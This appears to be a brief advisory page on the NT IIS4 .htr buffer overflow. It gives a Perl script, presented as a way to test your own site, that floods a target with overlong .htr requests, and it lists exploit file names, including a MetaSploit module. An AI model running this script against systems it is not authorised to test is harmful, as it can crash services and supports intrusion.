NT IIS4 Buffer Overflow Vulnerability

NT IIS4 Buffer Overflow Vulnerability

Use the following script to test your site:

#!/usr/bin/perl
use LWP::Simple;
for ($i = 2500; $i <= 3500; $i++) {
warn "$i\n";
get "http://$ARGV[0]/".('a' x $i).".htr";
}

An exploit has been released as part of the MetaSploit Framework 2.3.

/data/vulnerabilities/exploits/iishack.exe
/data/vulnerabilities/exploits/iis-injector.c
/data/vulnerabilities/exploits/tesoiis.c
/data/vulnerabilities/exploits/iis40_htr.pm